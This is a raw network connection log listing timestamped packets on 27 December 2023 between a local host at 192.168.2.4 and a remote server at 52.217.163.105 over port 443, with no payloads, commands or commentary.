Dec 27, 2023 17:57:21.123109102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123120070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123142958 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123182058 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123225927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123253107 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123259068 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123270988 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123284101 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123311043 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123397112 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123419046 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123454094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123471975 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123481035 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123496056 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123567104 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123590946 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123611927 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123620033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123646021 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123883963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123924971 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123950958 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123959064 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123969078 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123984098 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124015093 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124057055 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124082088 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124111891 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124119043 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124145031 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124167919 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124174118 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124186039 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124212027 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124233961 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124242067 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124268055 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124298096 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124332905 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124351025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124361038 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124389887 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124416113 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124629021 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124645948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124677896 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124686003 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124699116 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124726057 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124731064 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124845982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124866009 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124892950 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.124898911 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.124918938 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125088930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125127077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125148058 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125152111 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125165939 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125181913 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125209093 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125296116 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125312090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125353098 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125360966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125391960 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125400066 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125462055 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125479937 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125509977 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125518084 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125540018 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125571966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125610113 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125624895 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125633955 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125659943 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125689030 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125736952 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125761032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125790119 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125796080 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125802040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.125813007 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.125838041 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.167567015 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.280774117 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.280807972 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.280843019 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.280908108 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.280939102 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.280966997 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.281332016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281362057 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281394005 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.281404018 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281430960 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.281611919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281626940 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281662941 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.281672955 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281692028 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.281816006 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281835079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281862020 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.281868935 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.281888008 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282073975 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282111883 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282120943 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282130957 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282162905 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282289982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282322884 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282341957 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282350063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282381058 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282430887 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282469034 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282490015 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282506943 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282520056 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282566071 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282589912 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282613993 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282619953 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282648087 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282929897 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282957077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282983065 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.282985926 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.282999039 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283023119 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283041000 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283432007 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283447981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283485889 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283493996 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283510923 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283533096 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283535004 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283544064 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283564091 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283586025 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283586025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283596992 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283616066 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283648014 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283780098 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283799887 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283832073 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283839941 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283871889 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283894062 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283899069 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283915043 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283936977 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.283971071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.283977032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284013033 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284209967 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284229040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284260988 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284276009 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284296036 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284382105 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284411907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284447908 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284449100 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284457922 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284476995 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284503937 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284616947 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284647942 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284682035 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284688950 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.284715891 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284734011 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.284738064 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285023928 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285048962 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285082102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285088062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285108089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285311937 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285346985 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285367966 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285377979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285407066 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285423040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285449982 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285456896 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285474062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285485029 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285505056 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285511017 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285536051 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285559893 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285563946 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285722017 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285739899 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285775900 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285783052 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285804987 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285882950 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285902023 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.285959959 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.285970926 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286005974 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.286127090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286142111 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286194086 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.286199093 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286218882 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286240101 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.286758900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286777973 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286809921 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.286823034 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286839008 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.286928892 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286942959 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286974907 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.286982059 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.286998987 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287106991 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287132978 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287157059 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287158966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287164927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287195921 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287223101 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287365913 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287388086 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287427902 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287446022 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287455082 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287475109 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287537098 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287559032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287587881 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287595034 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.287628889 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.287990093 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288029909 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288053036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288054943 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288063049 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288081884 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288101912 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288275003 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288290977 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288336992 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288341999 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288366079 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288383007 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288387060 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288624048 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288641930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288659096 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288667917 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288693905 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288814068 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288841963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288866997 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288872004 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288881063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.288899899 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.288922071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.294805050 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439075947 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439106941 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439173937 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439172983 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439198017 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439213991 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439238071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439240932 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439273119 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439279079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439310074 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439414024 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439454079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439470053 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439477921 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439502954 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439536095 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439563036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439583063 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439588070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439596891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439615965 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439636946 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439686060 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439701080 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439732075 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439734936 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439742088 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439759970 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439778090 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439838886 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439856052 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439883947 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439891100 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439909935 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.439973116 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.439997911 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440025091 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440030098 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440036058 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440057993 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440082073 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440249920 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440277100 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440304995 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440311909 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440331936 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440349102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440352917 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440431118 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440448999 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440474987 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440481901 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440510035 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440606117 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440624952 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440660954 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440669060 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440690041 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440706968 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440747023 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440757990 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440766096 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.440793991 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440810919 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.440995932 CET	443	49737	52.217.163.105	192.168.2.4
